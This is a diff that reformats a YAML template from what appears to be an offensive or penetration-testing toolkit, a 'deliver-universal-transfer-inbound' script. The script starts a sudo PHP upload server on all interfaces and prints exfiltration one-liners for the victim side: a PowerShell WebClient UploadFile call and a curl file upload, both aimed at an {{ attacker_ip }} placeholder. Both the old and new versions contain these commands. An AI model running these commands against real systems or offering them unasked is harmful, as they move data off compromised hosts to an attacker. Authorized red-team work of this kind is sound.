--- a/src/profi/templates/scripts/deliver-universal-transfer-inbound.yaml
+++ b/src/profi/templates/scripts/deliver-universal-transfer-inbound.yaml
@@ -1,33 +1,19 @@
+---
 metadata:
-  filename: deliver-universal-transfer-inbound.yaml
-  tags:
-  - web
-  created: '2025-03-29'
-  author: Unknown
-content: 'mkdir -p packstation/inbound/wwwroot; cp -n {{ templates_dir }}/helper_scripts/upload.php
-  packstation/inbound/wwwroot; \
+  filename: "deliver-universal-transfer-inbound.yaml"
+  tags: ["web"]
+  created: "2025-03-29"
+  author: "Unknown"
 
-  echo ''================================================================''; \
-
-  echo ''                      -----PowerShell-----                      ''; \
-
-  echo ''Upload data (absolute paths only): (New-Object System.Net.WebClient).UploadFile(\''http://{{
-  attacker_ip }}:{{ delivery_inbound_port }}/upload.php\'',\''FILE\'')''; \
-
-  echo ''================================================================''; \
-
-  echo ''                         -----CMD-----                          ''; \
-
-  echo ''================================================================''; \
-
-  echo ''                         ----Linux----                          ''; \
-
-  echo ''Upload data: curl -v http://{{ attacker_ip }}:{{ delivery_inbound_port }}/upload.php
-  -F "file=@FILE"''; \
-
-  echo ''================================================================''; \
-
-  sudo php -d post_max_size=0 -d memory_limit=-1 -d upload_max_filesize=10G -d max_execution_time=120
-  -S 0.0.0.0:{{ delivery_inbound_port }} -t packstation/inbound/wwwroot
-
-  '
+content: |
+  mkdir -p packstation/inbound/wwwroot; cp -n {{ templates_dir }}/helper_scripts/upload.php packstation/inbound/wwwroot; \
+  echo '================================================================'; \
+  echo '                      -----PowerShell-----                      '; \
+  echo 'Upload data (absolute paths only): (New-Object System.Net.WebClient).UploadFile(\'http://{{ attacker_ip }}:{{ delivery_inbound_port }}/upload.php\',\'FILE\')'; \
+  echo '================================================================'; \
+  echo '                         -----CMD-----                          '; \
+  echo '================================================================'; \
+  echo '                         ----Linux----                          '; \
+  echo 'Upload data: curl -v http://{{ attacker_ip }}:{{ delivery_inbound_port }}/upload.php -F "file=@FILE"'; \
+  echo '================================================================'; \
+  sudo php -d post_max_size=0 -d memory_limit=-1 -d upload_max_filesize=10G -d max_execution_time=120 -S 0.0.0.0:{{ delivery_inbound_port }} -t packstation/inbound/wwwroot
